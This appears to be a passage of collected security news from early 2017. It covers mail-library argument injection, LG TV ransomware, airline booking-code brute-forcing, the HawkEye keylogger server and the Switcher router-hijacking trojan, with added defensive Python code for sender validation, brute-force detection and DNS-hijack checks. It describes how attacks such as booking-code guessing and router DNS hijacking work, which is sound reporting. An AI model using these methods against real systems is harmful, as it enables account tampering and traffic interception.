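The changelog entries above describe the same root cause in all three libraries: an address taken from an untrusted source is handed to the local sendmail binary, and extra quote characters in it turn into extra command-line arguments. As an added illustration (not the fix shipped by PHPMailer, SwiftMailer or ZendMail, and not the researcher's code), the Python below shows the defensive pattern for that transport: accept only plain local@domain senders, rejecting quoted local parts and shell-significant characters outright, and pass the validated address as its own argv element so no shell ever tokenizes it. The strict regex, the forbidden-character set and the injectable runner are this example's own choices.

```python
import re
import subprocess

# Conservative sender policy: dot-atom local part (no quoting, no leading
# dash), dotted hostname labels, alphabetic TLD. Deliberately narrower than
# RFC 5321 so that quoted local parts such as "a b"@example.com are refused.
SENDER_RE = re.compile(
    r"^(?!-)[A-Za-z0-9._%+-]{1,64}"                             # local part
    r"@"
    r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+"    # domain labels
    r"[A-Za-z]{2,63}$"                                          # TLD
)

# Characters that have meaning to a shell or to quoting logic; none of them
# belongs in a sender we are willing to pass to sendmail.
FORBIDDEN_CHARS = set('"\'\\`;$&|<>()')


class UnsafeSenderError(ValueError):
    """Raised when an envelope sender must not reach the transport."""


def validate_sender(addr) -> str:
    """Return addr unchanged if it satisfies the policy, else raise."""
    if not isinstance(addr, str) or not 3 <= len(addr) <= 254:
        raise UnsafeSenderError("sender missing, too long or not a string")
    if any(ch.isspace() for ch in addr):
        raise UnsafeSenderError(f"sender contains whitespace: {addr!r}")
    if FORBIDDEN_CHARS & set(addr):
        raise UnsafeSenderError(f"sender contains forbidden character: {addr!r}")
    if not SENDER_RE.fullmatch(addr):
        raise UnsafeSenderError(f"sender is not plain local@domain: {addr!r}")
    return addr


def is_safe_sender(addr) -> bool:
    """Boolean form of validate_sender for form handlers and tests."""
    try:
        validate_sender(addr)
        return True
    except UnsafeSenderError:
        return False


def sendmail_argv(sender: str, sendmail_path: str = "/usr/sbin/sendmail") -> list:
    """Build the argument vector for the sendmail binary.

    The address is validated first and then placed in a single argv element
    (attached to -f). Because the list is executed without a shell, the
    address can never be split into additional arguments.
    """
    sender = validate_sender(sender)
    return [sendmail_path, "-t", "-i", "-f" + sender]


def send_message(sender: str, raw_message: bytes, run=subprocess.run):
    """Pipe a fully formed RFC 822 message to sendmail on stdin.

    `run` is injectable so the transport can be exercised without a real
    sendmail binary; in production the default subprocess.run is used and
    shell=False (the default) is what keeps argv intact.
    """
    argv = sendmail_argv(sender)
    return run(argv, input=raw_message, check=True)


if __name__ == "__main__":
    # Constructed inputs: a normal sender and a quoted-local-part sender of
    # the shape the advisories warn about.
    for candidate in ("alice@example.com", '"bob smith"@example.com'):
        print(candidate, "->", "accepted" if is_safe_sender(candidate) else "rejected")
```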
Golunski has released a proof-of-concept video demonstration showing all three attacks in action.

Golunski has also set up a dedicated website, nicknamed PwnScriptum, complete with a logo, that collects all the information about the vulnerabilities in PHPMailer, SwiftMailer and ZendMail in one place.
The researcher will soon publish a security white paper with previously unknown exploitation vectors and techniques that can be used to exploit all three vulnerabilities.

It has happened again, ransomware infected an LG Smart TV
3.1.2017 securityaffairs

The software engineer Darren Cauthon reported his LG Smart TV was infected with ransomware on Christmas day, the malware asked for $500 to unlock the device
IoT ransomware is a scary reality; the threat will grow in the coming months, and security firms have been warning the IT industry. Routers, smart TVs and CCTV cameras are all potential victims of this category of malware.

The most recent incident involved an LG smart TV: the software engineer Darren Cauthon reported that the device of one of his family members was infected with ransomware on Christmas day.

The TV got infected when the programmer’s wife downloaded an app to the TV that promised free movies; it was ransomware demanding US$500 to unlock the device.

The ransomware appears to be a version of the Cyber.Police ransomware, also known as FLocker and Frantic Locker.

FLocker isn’t a new threat; it has been around for a year, and crooks delivered it to victims via spam SMS campaigns or by sharing malicious links.

The FLocker ransomware was first spotted in May 2015, and security experts from Trend Micro have since detected more than 7,000 strains of the same malware. The threat actors behind FLocker have updated the threat over time, improving it and making its detection by security solutions harder. Over the past few months the experts observed a number of spikes and drops in the number of iterations released in the wild; in the last wave of infections, observed in mid-April 2016, the researchers detected over 1,200 variants.

Darren Cauthon @darrencauthon
Family member's tv is bricked by Android malware. #lg won't disclose factory reset. Avoid these "smart tvs" like the plague.
19:59 - 25 Dec 2016
Darren Cauthon’s LG smart TV runs Google TV, a project discontinued by Google in June 2014.

Currently, LG has moved to webOS, an open-source, Linux kernel-based multitasking operating system.

Cauthon tried to reset the TV to factory settings, but the reset procedure available online didn’t work, so he decided to contact customer service. He was invited to take the set to a service center for assistance, which implied a $340 bill for the support.

To sum up, the ransomware asked for $500 to unlock the device, and the sad news is that LG also asked $340 for the support.

The story has a happy ending: LG provided hidden reset instructions to remove the ransomware from the LG Smart TV.

The company offered factory reset steps that are not publicly available.

Below is the video shared by The Register:

“With the TV powered off, place one finger on the settings symbol then another finger on the channel down symbol. Remove finger from settings, then from channel down, and navigate using volume keys to the wipe data/ factory reset option.” states The Register.

Darren Cauthon @darrencauthon
The TV is saved! Thanks to LG for providing the factory reset instructions. I recorded a YouTube video of the fix: https://youtu.be/0WZ4uLFTHEE
06:15 - 29 Dec 2016

#33C3 - Changing travelers' flight bookings is really too easy for hackers
2.1.2017 securityaffairs Hacking

Changing travelers’ flight bookings is too easy. Karsten Nohl’s research on the insecurity of traveler flight information is absolutely astounding.
Current travel booking systems are deeply insecure and lack security by design, as the well-known hackers Karsten Nohl and Nemanja Nikodijevic demonstrated at the 33rd Chaos Communication Congress held in Hamburg last week (“Where in the World Is Carmen Sandiego?”).

The experts explained that it is quite easy to modify any passenger’s reservation, cancel their flight bookings, and even use the refunds to book tickets for themselves.

The security duo spent several months researching the security of the Global Distribution Systems (GDSs) used by various actors in the travel industry, including airlines, travel agencies, hotels and car rental companies.

Below is the video of the presentation held during the 33rd Chaos Communication Congress.

GDSs are enormous archives containing all the information about travel bookings. They hold so-called Passenger Name Records (PNRs), which include the traveler’s name, itinerary, travel dates, ticket details, phone number, email, passport information, credit card numbers, seat numbers and baggage information. Travel data is precious to scammers and phishers, who could use it to launch targeted attacks and organize complex frauds.

As explained by the experts, the most important GDS operators in the world are Sabre, Travelport and Amadeus. The disconcerting discovery made by the researchers is that it is possible to add or modify any travel data by accessing the system with just a last name and a six-character booking code.

We have to think of GDSs as systems accessible from everywhere: access points include airline websites, travel agencies, and also third-party websites like CheckMyTrip. Whenever a trip includes flights with different airlines, the booking can be modified through the website of any of the airlines operating the trip.

Attackers could cancel a flight and, if the booking allows the change, use the credit given by the airline to book a new ticket.

Unfortunately, the level of protection for the PNR is very poor: the booking code is easy to obtain, as it is printed on luggage tags and is also embedded in the QR codes printed on tickets.

Passengers tend to throw away old boarding passes even when the overall trip isn’t yet complete, or, even worse, post pictures of their tickets on social networks.

We explained in the past that a boarding pass contains personal information that could be exploited by hackers.

The popular investigator Brian Krebs published an interesting post on the topic explaining that a Boarding Pass Barcode contains a lot of data.

The experts highlighted that there is no logging implemented in the GDSs, which means it is impossible to tell legitimate accesses from malicious ones.

“In the short term, at the very least we should expect websites that give access to travelers’ personal information to have the bare minimum of web security, and this includes at the very least some rate limiting. And until passwords and other security measures become common, I think we have a right to know who accesses our records and there must be some accountability, especially knowing how insecure these systems are today.” explained Nohl.

Karsten Nohl and Nemanja Nikodijevic explained that many airline and trip checking websites don’t limit the number of bad codes users can enter before they’re blocked, opening the door to brute force code-guessing attacks.

The duo demonstrated that it is a matter of minutes to find matching booking codes for popular last names using automated methods. Brute-force code-guessing attacks against GDSs are very easy because the systems use only uppercase letters. The researchers explained that one of the GDSs analyzed doesn’t use 1 and 0, to avoid confusion with the letters I and O, and two other GDSs assign codes sequentially, making it easier for an attacker to guess a code within a sequence.
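The two preceding paragraphs point at the missing control: nothing notices a burst of failed last-name/booking-code lookups. The Python below is an added detection example, not code from the researchers or any GDS, that runs over a constructed access log of a PNR-lookup endpoint and flags any client IP, and any last name, with five or more failed lookups inside a sliding 60-second window (the per-name view catches guessing spread across many source addresses). Log format, field names and thresholds are this example’s own assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample access log of a PNR lookup endpoint (not real traffic).
# Fields: ISO timestamp, client IP, last name, six-character booking code, outcome.
SAMPLE_LOG = """\
2016-12-27T10:00:00 203.0.113.5 SMITH AB3K9Q FAIL
2016-12-27T10:00:03 203.0.113.5 SMITH AB3K9R FAIL
2016-12-27T10:00:06 203.0.113.5 SMITH AB3K9S FAIL
2016-12-27T10:00:09 203.0.113.5 SMITH AB3K9T FAIL
2016-12-27T10:00:12 203.0.113.5 SMITH AB3K9U FAIL
2016-12-27T10:00:15 203.0.113.5 SMITH AB3K9V FAIL
2016-12-27T10:00:20 198.51.100.7 JONES QWE123 OK
2016-12-27T10:01:40 198.51.100.9 MILLER ZXC456 FAIL
2016-12-27T10:01:45 198.51.100.9 MILLER ZXC457 OK
"""


def parse_log(text: str) -> list:
    """Turn the constructed log format into event dicts; blank lines skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, name, code, outcome = line.split()
        events.append({
            "ts": datetime.fromisoformat(ts),
            "ip": ip,
            "name": name.upper(),
            "code": code.upper(),
            "ok": outcome == "OK",
        })
    return events


def detect_guessing(events: list, threshold: int = 5,
                    window: timedelta = timedelta(seconds=60)) -> dict:
    """Flag keys with >= threshold failed lookups inside a sliding window.

    Two independent views are kept: per source IP (a single noisy client)
    and per last name (guessing distributed over many IPs against one
    passenger). Returns {"ip": {key: failures}, "name": {key: failures}}
    recording the failure count at the moment each key was first flagged.
    """
    recent = {"ip": defaultdict(deque), "name": defaultdict(deque)}
    alerts = {"ip": {}, "name": {}}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["ok"]:
            continue  # only failed guesses count towards the threshold
        for kind in ("ip", "name"):
            key = ev[kind]
            q = recent[kind][key]
            q.append(ev["ts"])
            # Drop failures that fell out of the window.
            while q and ev["ts"] - q[0] > window:
                q.popleft()
            if len(q) >= threshold and key not in alerts[kind]:
                alerts[kind][key] = len(q)
    return alerts


def flagged_ips(log_text: str) -> list:
    """Convenience wrapper returning the offending source IPs, sorted."""
    return sorted(detect_guessing(parse_log(log_text))["ip"])


if __name__ == "__main__":
    print(detect_guessing(parse_log(SAMPLE_LOG)))
```

In practice the same sliding-window counter is what a rate limit in front of the lookup form would be built on; here it is run after the fact so the burst is at least visible.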

“The travel agencies have their own master logins into the GDSs and these accounts have very weak passwords. In one case the password was WS, which stands for web service, followed by the date when the login was created in DDMMYY format. This can easily be brute-forced and unfortunately it was one of the most complex travel agency passwords the researchers observed.” reported CSOonline.

The lack of security could be exploited by crooks to add their own frequent flier number to other passengers’ long-haul flights in order to gain the reward miles for themselves.

As demonstrated by the experts, hackers can do much more than change flight bookings,

UK security minister: ISIS would launch chemical attacks in the UK
2.1.2017 securityaffairs Cyber

ISIS is seeking to launch mass-casualty chemical attacks in Europe, said security minister Ben Wallace.
The UK security minister Ben Wallace declared that the terror group wants to carry out a mass-casualty attack in the UK by ‘whatever means possible.’
According to the minister, members of ISIS have “no moral barrier” to using chemical weapons against the helpless population.

“They have no moral objection to using chemical weapons against populations and if they could, they would in this country.” said Wallace.

“The casualty figures which could be involved would be everybody’s worst fear.”

“We have certainly seen reports of them using it in Syria and Iraq [and] we have certainly seen aspiration for it in Europe.”

He confirmed that there were reports of ISIS using chemical weapons in the areas under its control in Syria and Iraq.

The report also notes that Moroccan authorities arrested a terrorist cell in February that was in possession of substances that could be used to make a chemical weapon.

Wallace also cited a recent report issued by Europol that warned of the chemical threat.

In December 2015, a European Parliament report confirmed that ISIS had already smuggled CBRN material into the EU and warned of WMD attacks.
The report confirmed that ISIS was recruiting foreign fighters with specific competencies in physics, chemistry, and computer science.

“ISIL/Da’esh has recruited and continues to recruit hundreds of foreign fighters, including some with degrees in physics, chemistry and computer science, who experts believe have the ability to manufacture lethal weapons from raw substances.”

Now Wallace has told the Sunday Times that ISIS plans to conduct “definitely mass casualty attacks” to harm as many people as possible.

Commenting on the US sanctions against Russians for the alleged interference in the presidential election, Wallace warned of a possible insider threat. Terrorist groups and foreign governments have all launched campaigns to recruit “traitors” in the UK Government, the military and leading businesses.
“There are traitors. We have to be on our guard for the enemy within,” he said.

“The insider threat, as we would call it, is real and it can be exploited and there are people trying to do that as we speak.”

Trump will soon reveal the truth about the alleged Russian hacking
2.1.2017 securityaffairs Hacking

President Donald J. Trump is expressing skepticism about intelligence assessments of the Russian hacking and will provide more information very soon.
The executive order issued by President Obama in retaliation for the alleged Russian interference in the Presidential Election is raising a heated debate on the measures adopted by the US Government and on its ability to provide evidence of Russian malicious cyber activities.

The US expelled 35 Russian intelligence operatives from the United States and imposed sanctions on nine entities and individuals. The US Government sanctioned the Russian intelligence services, the GRU (Russian Main Intelligence Directorate) and the FSB (Federal Security Service), four GRU officers, and three other organizations.

The report published by the US Government doesn’t provide any new information; everything it includes had already been reported in analyses conducted by security firms such as CrowdStrike.

In June, the security research firm CrowdStrike reported on a cyber breach of the Democratic National Committee (DNC). CrowdStrike’s incident response team discovered not one but two hacking groups that it considers “some of the best adversaries out of the all the numerous nation-state” groups the company encounters daily: COZY BEAR and FANCY BEAR.

This is exactly the same info that we have found in the JAR report published by the US Government that linked the cyber activity to a Russian threat actor designated as GRIZZLY STEPPE.

Security experts at the security firm Wordfence published an interesting report in which they analyzed the PHP malware sample and the IP addresses that the US government provided as proof of the involvement of Russian hackers in the attacks against the Presidential Election.

“We used the PHP malware indicator of compromise (IOC) that DHS provided to analyze the attack data that we aggregate to try to find the full malware sample. We discovered that attackers use it to try to infect WordPress websites. We found it in the attacks that we block.”

Experts from Wordfence traced the malware code to a tool available online, dubbed P.A.S., that claims to be “made in Ukraine.”

“One might reasonably expect Russian intelligence operatives to develop their own tools or at least use current malicious tools from outside sources,” the report says.

The report published by WordFence includes the list of IP addresses that “don’t appear to provide any association with Russia” and “are probably used by a wide range of other malicious actors.”

“The malware sample is old, widely used and appears to be Ukrainian. It has no apparent relationship with Russian intelligence and it would be an indicator of compromise for any website.” reads the report from WordFence.

The IT security industry is aware of Russian interference, but clearly the analysis provided by the US Government contains very few elements of interest.

What is the position of President-elect Donald J. Trump on the Russian hacking?

We all know that the alleged Russian interference aimed to disrupt Clinton’s campaign, due to the relationship between Putin and Trump.

President Donald J. Trump is expressing skepticism about intelligence assessments of the Russian hacking and the Kremlin’s interference in the election.

According to the NYT, speaking to reporters outside his Palm Beach, Fla., club, Mar-a-Lago, on Saturday evening, he claimed to know “things that other people don’t know” about the alleged hacking campaigns that targeted the Presidential Election. Trump announced that he will share the information “on Tuesday or Wednesday.”

“I just want them to be sure because it’s a pretty serious charge,” said Mr. Trump. “If you look at the weapons of mass destruction, that was a disaster, and they were wrong,” he added, referring to intelligence cited by the George W. Bush administration to support its march to war in 2003. “So I want them to be sure,” the president-elect said. “I think it’s unfair if they don’t know.”

“And I know a lot about hacking. And hacking is a very hard thing to prove. So it could be somebody else. And I also know things that other people don’t know, and so they cannot be sure of the situation.”

Trump’s approach to technology is anachronistic: he advised people to avoid computers when dealing with delicate material.
“It’s very important, if you have something really important, write it out and have it delivered by courier, the old-fashioned way, because I’ll tell you what, no computer is safe,” Mr. Trump said.
“I don’t care what they say, no computer is safe,” he added. “I have a boy who’s 10 years old; he can do anything with a computer. You want something to really go without detection, write it out and have it sent by courier.”

The only sensible answer to date is that of Russian President Putin, who avoided responding to Obama’s executive order.

Firefox 52 more privacy oriented with a Tor protection mechanism
2.1.2017 securityaffairs Safety
The Mozilla development team has announced a new privacy protection mechanism that will come with Firefox 52, which aims to prevent websites from fingerprinting users.
Mozilla announced the introduction in Firefox 52 of a new privacy protection mechanism that prevents websites from fingerprinting users through system fonts.

The technique is widely adopted by advertising companies via hidden scripts delivered with ads: they collect the list of local fonts and, along with other data, create a unique fingerprint (ID) for each user.

In this way the companies aim to deliver targeted ads and track users across the web.

The experts at Mozilla have implemented a feature to only expose whitelisted system fonts to avoid fontlist fingerprinting. The new feature will be included in the stable branch of Firefox 52, scheduled for release on March 7, 2017.

The user privacy protection mechanism was already implemented by Mozilla in the Tor Browser; it was developed to block websites from identifying visitors based on the fonts installed on their machines.

The font fingerprinting protection is already available in Firefox 52 Beta.

“Defending against font fingerprinting is complex. We have to worry about distinguishing attacks via differing installed font sets, text rendering engine differences, and font variants. There are a variety of tickets involved.” states the Tor Development Team.

“In #13313, we introduced a Tor Browser pref, “font.system.whitelist”, which accepts a list of fonts and excludes all others from the browser.”

How does the feature work?

The feature leverages a whitelist of system fonts for each operating system: the browser will not block queries for system fonts, but it will provide the same answer for every user, making it impossible to distinguish them.

The practice of font fingerprinting relies on website operators deploying Flash or JS scripts that query the user’s browser for a list of locally installed fonts.

The news confirms Mozilla’s intention to protect users’ privacy: in July the development team launched the Tor Uplift project, a significant effort to improve the privacy features implemented in Firefox.

“To uplift all of the Tor Browser patches to mainline Firefox. The general approach is to add preferences for anything that breaks the web and set them to default “off” so that the behavior of default Firefox does not change. All bugs are tagged with [tor]. The Tor Browser design document is here.” states the description of the project.

A new iPhone bug will crash the Messages app with a single text
1.1.2017 securityaffairs Apple

A researcher discovered that a single text message sent by MMS could be exploited to crash the Messages app on iOS due to a recently discovered bug.
A single text message could be exploited to disable the Messages app on any iPhone due to a recently discovered bug.

The flaw makes the Apple Messages app inoperable, making it impossible to read text messages or iMessages. The flaw is serious: the app will continue to crash even when the user closes it or reboots the device.
In order to exploit the flaw, it is necessary to send the target device a vCard (a transferable Address Book contact) containing so many lines that the Messages app is not able to process it.

When the Messages app opens the message containing the vCard, it tries to open it and freezes, displaying a white screen.
Below is a video PoC of the vulnerability.

Because the Messages app always tries to open the most recent text message when it is launched, it will continue trying to open the malicious message even when the app is closed or the whole phone is rebooted.
“When you click, iOS want to read the text, the text in the file is very complicated for the system and cause a CPU average: the app freeze. You close the app, want to reopen but iOS want to reload the previous message but can’t because it’s the vcf file.” reads the blog post published by vincedes3.

The bug is similar to the “Effective Power” bug discovered in May 2015, when users noticed that a text message containing a string of Arabic text would crash phones.

Back to the present, there is good news for users who have received the malicious message. There are at least two workarounds to remove the message from the top of the inbox:

By clicking this fix link, vincedes3.com/save.html: it opens the window for sending a new message; press cancel and then delete the malicious message.
By sending yourself a message via Siri, or asking someone else to send you a message. Once the message is received, the Messages app will let you open the new message instead of the malicious one.

vincedes3 @vincedes3
For devices (including iPad) where the fix link does not work, ask Siri to send a message to the victim and click on the text.
11:27 - 29 Dec 2016

One-stop-shop: Server steals data then offers it for sale
1.1.2017 Kaspersky
While intercepting traffic from a number of infected machines that showed signs of Remote Admin Tool malware known as HawkEye, we stumbled upon an interesting domain. It was registered to a command and control server (C2) which held stolen keylog data from HawkEye RAT victims, but was also being used as a one-stop-shop for purchasing hacking goods.

WhiteHats on the prowl?

Before diving into an analysis of the server, it is worth pointing out some interesting behavior spotted in several of the victims’ stolen accounts. A group of WhiteHat hackers who call themselves Group Demóstenes were found to be working around the clock, trawling the internet and looking to exfiltrate stolen data from C2 servers. When such a server was found, the group looked for a backdoor that would give them control over the filesystem. They would then monitor the incoming stolen data. Either manually or automatically, they would collect the stolen credentials and send emails to the victims’ accounts. These emails contained an attachment with proof that the user’s machine had been compromised. In addition, they advised the user to change passwords immediately and offered to help.

Hi ***********

Our SERVERS detected information from a server on the US, we don’t even know goverment or another sourse …. we send a file with all your logins and passwords of all your accounts from hxxp://www.p******op[.]biz/*******
Seme you verify this information. it’s better thing we hurt all change password on the other computer Because Called Computer

Local Time: 03.10.2016. 18:45:02
Installed Language: en-
Net Version: 2.0.50727.5485
Operating System Platform: Win32NT
Operating System Version: 6.1.7601.65536
Operating System: Microsoft Windows 7 Home Premium
Internal IP Address:
External IP Address:
Installed Anti virus: Avast Antivirus
Installed Firewall:

have a keylogger harm report All That You write, messages, passwords or more.

¿Why we do it?
We have a Cause Called Group Demóstenes looking for Ciber attacks and false info.
Please Donate by PayPal at h**cg**an@gmail[.]com 5 USD or more, Because this is only our ingress.


The email above appears in two languages, English and Spanish. The name of the group appears to be of Portuguese origin, though it is not certain.

The shopfront: the command and control servers

Scanning for network services which are running on the C2, we discovered that it contains not only a back-end for storing stolen credentials but also a front-end for selling some of them, alongside many other “goods”.

Browsing the domain that communicated with the HawkEye RAT samples disclosed a login page. Given the fact that the server was newly operational, it allowed users to register an account and login to purchase the goods on offer.

After registering on the C2 web application, there was no sign of the stolen data transferred from compromised machines. A forum-like web page opens once the login succeeds.

The C2 was meant to securely store the stolen data; however, it contained a crucial vulnerability which allowed researchers to download the stolen data.

The C2 owners seem to have added six new Shell scripts on 22 November, just a week before the research started – a further indication of how new the operation is.

Another item for sale is scam pages, and some are multilingual. The attackers also reveal the scope of their victims, noting those who are registered to Amazon, Apple, Netflix and even National Bank of Australia and Barclays. The listing of the year next to the banking information probably refers to how up-to-date the scam pages are in terms of the bank’s website updates.

The attackers have spared no details and have added additional information regarding how one should act when using their services, and who to contact in the Support tab.

To purchase goods in the private shop you must deposit money into your account on the website. The attackers accept Bitcoins, PerfectMoney and WebMoney.

Back to the stolen data

As we described, HawkEye is a robust keylogger that can capture keystrokes from any application opened on the victim's PC. It can also identify login events and record the destination, username and password. Its usefulness is limited, however, where two-factor authentication or single sign-on is in place, since a captured password alone is not enough to log in.

The stolen credentials on the server included passwords for government, healthcare, banking and payment web applications. Among them was a web server belonging to the Pakistani government.


As mentioned, hundreds of machines were found to be compromised by just one C2. The following is a partial list of what was downloaded from the malicious server.


Careless threat actors often forget to remove test files, which may contain sensitive data. In this case, we were able to obtain the attackers' own credentials from one very small file that turned up while searching for related strings.

Target geography

The research is still ongoing. The campaign currently affects users located in APAC, such as Japan, Thailand and India, as well as parts of Eastern Europe such as Russia and Ukraine.

Switcher: Android joins the ‘attack-the-router’ club
1.1.2017 Kaspersky Android
Recently, in our never-ending quest to protect the world from malware, we found a misbehaving Android trojan. Although malware targeting the Android OS stopped being a novelty quite some time ago, this trojan is quite unique. Instead of attacking a user, it attacks the Wi-Fi network the user is connected to, or, to be precise, the wireless router that serves the network. The trojan, dubbed Trojan.AndroidOS.Switcher, performs a brute-force password guessing attack on the router’s admin web interface. If the attack succeeds, the malware changes the addresses of the DNS servers in the router’s settings, thereby rerouting all DNS queries from devices in the attacked Wi-Fi network to the servers of the cybercriminals (such an attack is also known as DNS-hijacking). So, let us explain in detail how Switcher performs its brute-force attacks, gets into the routers and undertakes its DNS-hijack.

Clever little fakes

To date, we have seen two versions of the trojan:

acdb7bfebf04affd227c93c97df536cf; package name – com.baidu.com
64490fbecefa3fcdacd41995887fe510; package name – com.snda.wifi
The first version (com.baidu.com) disguises itself as a mobile client for the Chinese search engine Baidu, simply opening the URL http://m.baidu.com inside the application. The second version is a well-made fake of a popular Chinese app (http://www.coolapk.com/apk/com.snda.wifilocating) for sharing information about Wi-Fi networks (including the security password) between users of the app. Such information is used, for example, by business travelers to connect to a public Wi-Fi network whose password they don't know. It is a good place to hide malware targeting routers, because users of such apps usually connect to many Wi-Fi networks, thus spreading the infection.

The cybercriminals even created a website (though badly made) to advertise and distribute the aforementioned fake version of com.snda.wifilocating. The web server that hosts the site is also used by the malware authors as the command-and-control (C&C) server.

The infection process

The trojan performs the following actions:

Gets the BSSID of the network and informs the C&C that the trojan is being activated in a network with this BSSID
Tries to get the name of the ISP (Internet Service Provider) and uses that to determine which rogue DNS server will be used for DNS-hijacking. There are three possible DNS servers –, and; with being the default choice, while the others will be chosen only for specific ISPs
Launches a brute-force attack with the following predefined dictionary of logins and passwords:
The trojan gets the default gateway address and then tries to access it in the embedded browser. With the help of JavaScript it tries to log in using different combinations of logins and passwords. Judging by the hardcoded names of the input fields and the structure of the HTML documents the trojan tries to access, the JavaScript code will work only on the web interfaces of TP-LINK Wi-Fi routers.

If the attempt to get access to the admin interface is successful, the trojan navigates to the WAN settings and exchanges the primary DNS server for a rogue DNS controlled by the cybercriminals, and a secondary DNS with (the Google DNS, to ensure ongoing stability if the rogue DNS goes down). The code that performs these actions is a complete mess, because it was designed to work on a wide range of routers and works in asynchronous mode. Nevertheless, I will show how it works, using a screenshot of the web interface and by placing the right parts of the code successively.

If the DNS addresses were changed successfully, the trojan reports its success to the C&C.

So, why is it bad?

To appreciate the impact of such actions it is crucial to understand the basic principles of how DNS works. DNS resolves the human-readable name of a network resource (e.g. a website) into the IP address that is used for the actual communication on the network; for example, the name "google.com" is resolved into an IP address. In general, a normal DNS query is performed in the following way:

When using DNS-hijacking, the cybercriminals change the victim’s (which in our case is the router) TCP/IP settings to force it to make DNS queries to a DNS server controlled by them – a rogue DNS server. So, the scheme will change into this:

As you can see, instead of communicating with the real google.com, the victim will be fooled into communicating with a completely different network resource. This could be a fake google.com, saving all your search requests and sending them to the cybercriminals, or it could just be a random website with a bunch of pop-up ads or malware. Or anything else. The attackers gain almost full control over the network traffic that uses the name-resolving system (which includes, for example, all web traffic).

You may ask why it matters: routers don't browse websites, so where's the risk? Unfortunately, the most common Wi-Fi router configuration hands the router's own DNS settings to every device that connects to it (via DHCP), thus forcing all devices in the network to use the same rogue DNS. So, after gaining access to a router's DNS settings, one can control almost all the traffic in the network served by this router.

The cybercriminals were not cautious enough and left their internal infection statistics in the open part of the C&C website.

According to them, they successfully infiltrated 1,280 Wi-Fi networks. If this is true, traffic of all the users of these networks is susceptible to redirection.


Trojan.AndroidOS.Switcher does not attack users directly. Instead, it targets the entire network, exposing all its users to a wide range of attacks, from phishing to secondary infection. The main danger of such tampering with router settings is that the new settings survive a reboot of the router, and it is very difficult to notice that the DNS has been hijacked. Even if the rogue DNS servers are disabled for some time, the secondary DNS (the public Google resolver the trojan configured) will be used, so users and/or IT will not be alerted.

We recommend that all users check their DNS settings and search for the following rogue DNS servers:
If you have one of these servers in your DNS settings, contact your ISP support or alert the owner of the Wi-Fi network. Kaspersky Lab also strongly advises users to change the default login and password to the admin web interface of your router to prevent such attacks in the future.
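Two checks follow naturally from the infection process and the DNS explanation above: which resolvers the router is handing out, and whether those resolvers answer honestly. The block below is an added example, not Kaspersky's code. It assumes placeholder addresses for the rogue resolvers (the real indicators are not reproduced on this page) and for a trusted resolver, and carries its own minimal DNS wire-format encoder and decoder so that the comparison logic can be exercised offline on constructed packets.

```python
"""Offline-testable checks for router DNS hijacking of the Switcher kind.

Added example, not Kaspersky's code. ROGUE_DNS and TRUSTED_DNS are placeholders
from the RFC 5737 documentation ranges; replace them with real indicators and a
resolver you actually trust.
"""
import ipaddress
import socket
import struct

ROGUE_DNS = {"198.51.100.1", "198.51.100.2"}   # placeholder, not the real indicators
TRUSTED_DNS = "192.0.2.53"                       # placeholder for a trusted resolver


def build_query(name, txid=0x1234):
    """Minimal DNS A query in wire format (RD bit set, one question)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in name.strip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)   # QTYPE=A, QCLASS=IN


def _read_name(pkt, off):
    """Decode a (possibly compressed) domain name; returns (name, next_offset)."""
    labels = []
    while True:
        ln = pkt[off]
        if ln == 0:
            return ".".join(labels), off + 1
        if ln & 0xC0 == 0xC0:                          # compression pointer
            ptr = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            labels.append(_read_name(pkt, ptr)[0])
            return ".".join(labels), off + 2
        labels.append(pkt[off + 1:off + 1 + ln].decode())
        off += 1 + ln


def parse_a_records(pkt):
    """Return the IPv4 addresses found in the answer section of a DNS response."""
    _, _, qd, an, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    off = 12
    for _ in range(qd):
        _, off = _read_name(pkt, off)
        off += 4                                        # skip QTYPE + QCLASS
    ips = []
    for _ in range(an):
        _, off = _read_name(pkt, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            ips.append(str(ipaddress.IPv4Address(pkt[off:off + 4])))
        off += rdlen
    return ips


def build_response(query, ips, ttl=300):
    """Constructed response to `query` answering with `ips`; simulates a resolver offline."""
    txid = struct.unpack("!H", query[:2])[0]
    question = query[12:]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(ips), 0, 0)
    rrs = b"".join(b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + ipaddress.IPv4Address(ip).packed
                   for ip in ips)                       # 0xc00c = pointer to the question name
    return header + question + rrs


def query_resolver(name, resolver, timeout=2.0):
    """Live UDP lookup against `resolver` (needs network; not used by the offline checks)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name), (resolver, 53))
        data, _ = s.recvfrom(512)
    return parse_a_records(data)


def rogue_resolvers_configured(configured, rogue=ROGUE_DNS):
    """Check 1: resolver addresses handed out by the router that match known rogue ones."""
    return sorted(set(configured) & set(rogue))


def hijacked_names(router_answers, trusted_answers):
    """Check 2: names for which the router's resolver and the trusted one share no A record."""
    return sorted(n for n, ips in router_answers.items()
                  if not set(ips) & set(trusted_answers.get(n, [])))
```

On a live network, run query_resolver() for a handful of well-known names against the resolver the router handed out via DHCP and against the trusted one, then pass both answer dictionaries to hijacked_names(); any name on which the two share no address is suspect. Keep the article's caveat in mind: if the rogue primary is merely offline, answers come from the public secondary and the comparison looks clean, which is why the configured-address check is needed as well.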

Alleged Russian operation has compromised a laptop at a Vermont utility

31.12.2016 securityaffairs Cyber

Code associated with the Russian hacking operation dubbed Grizzly Steppe by the Obama administration was found on a laptop at a Vermont utility.
Russian hackers are again in the headlines: according to US officials, they hacked a Vermont utility, raising concerns about the security of the country's electrical grid.

Researchers discovered on a laptop malware associated with Russian hacking operations; other experts later linked it to an outdated Ukrainian hacking tool.

